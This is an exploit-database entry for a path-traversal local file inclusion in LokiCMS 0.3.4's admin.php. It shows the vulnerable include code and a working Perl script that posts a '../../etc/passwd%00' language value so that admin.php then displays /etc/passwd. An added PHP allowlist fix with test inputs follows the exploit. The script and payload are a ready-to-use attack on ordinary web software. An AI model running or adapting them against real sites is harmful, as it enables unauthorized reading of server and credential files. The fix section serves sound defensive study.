LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit

2008-10-22 / 2008-10-23
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit
# url: http://www.lokicms.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
#
# *Requirements: magic_quotes_gpc = Off

-----------------------------------------------------------
I created the exploit that creates LFI.
-----------------------------------------------------------

vuln file: admin.php
vuln code:

    case 'A_SAVE_G_SETTINGS': //save main settings
        writeconfig ( $c_password, $_POST['title'], $_POST['header'], $_POST['tagline'], $_POST ['footnote'], $c_default, $_POST['theme'], $_POST['language'], $_POST['modrewrite'], $_POST['simplelink'], $_POST ['code'] );
        $c_theme = $_POST['theme'];
        include PATH . '/includes/Config.php';
        include PATH . '/languages/' . $c_lang . '.lang.php'; --------> FUCKING THIS INCLUDE!!!!
        $msg = $lang ['admin'] ['expressionSettingsSaved'];
        break;

--------
Exploit:
--------

    use LWP::UserAgent;

    unless ($ARGV[0] && $ARGV[1])
    {
        print "\n[x] LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit\n";
        print "[x] written by JosS - sys-project[at]hotmail.com\n";
        print "[x] usage: perl $0 [host] [path]\n";
        print "[x] example: perl $0 localhost /lokicms/ \n\n";
        exit(1);
    }

    my $lwp = new LWP::UserAgent or die;

    my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
    $target .= $ARGV[1] unless not defined $ARGV[1];
    $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/;

    my $res = $lwp->post($target.'admin.php',
        [ 'LokiACTION' => 'A_SAVE_G_SETTINGS',
          'language'   => '../../../../../../../../../../etc/passwd%00']);

    if($res->is_error)
    {
        print "[-] Exploit failed!\n";
        exit ();
    }

--------

ENTERS ADMIN.PHP TO SEE /ETC/PASSWD

Ingenious work :D
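
The root cause in the vulnerable code above is that the posted language value is saved to the configuration and then concatenated into an include path without validation. The following is an added example of a fix, not LokiCMS code and not part of the original advisory: the helper name safe_language(), the 'english' default and the temporary demo directory are assumptions, and the helper would be applied to the language field before writeconfig() and before the include.

```php
<?php
// Added example: hypothetical helper, not taken from LokiCMS.

/**
 * Return $requested only if it names a language pack installed in $langDir;
 * otherwise fall back to $default.
 */
function safe_language(string $requested, string $langDir, string $default = 'english'): string
{
    // 1. Syntactic check: letters, digits, underscore and hyphen only.
    //    This rejects "/", "\", ".", "%" and NUL bytes before the value
    //    is stored in the config or used in a path.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return $default;
    }

    // 2. Allowlist check: the name must match a pack that actually exists.
    $installed = [];
    foreach (glob(rtrim($langDir, '/') . '/*.lang.php') ?: [] as $file) {
        $installed[] = basename($file, '.lang.php');
    }
    return in_array($requested, $installed, true) ? $requested : $default;
}

// Constructed demo: a temporary languages/ directory holding two packs.
$dir = sys_get_temp_dir() . '/loki_lang_demo_' . getmypid();
@mkdir($dir);
foreach (['english', 'spanish'] as $name) {
    file_put_contents("$dir/$name.lang.php", "<?php \$lang = [];\n");
}

$inputs = [
    'spanish',                        // installed pack: accepted
    'klingon',                        // well-formed but not installed: default
    '../../../../etc/passwd' . "\0",  // traversal plus NUL byte: default
    '',                               // empty field: default
];
foreach ($inputs as $in) {
    printf("%-40s => %s\n", json_encode($in), safe_language($in, $dir));
}

// Clean up the constructed demo directory.
array_map('unlink', glob("$dir/*.lang.php"));
rmdir($dir);
```

Only the first input is returned unchanged; the other three resolve to the default, so the include can only ever reach a file that already exists in the languages directory.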

References:

http://www.securityfocus.com/bid/31743
http://xforce.iss.net/xforce/xfdb/45843
http://www.milw0rm.com/exploits/6744



Copyright 2024, cxsecurity.com

 
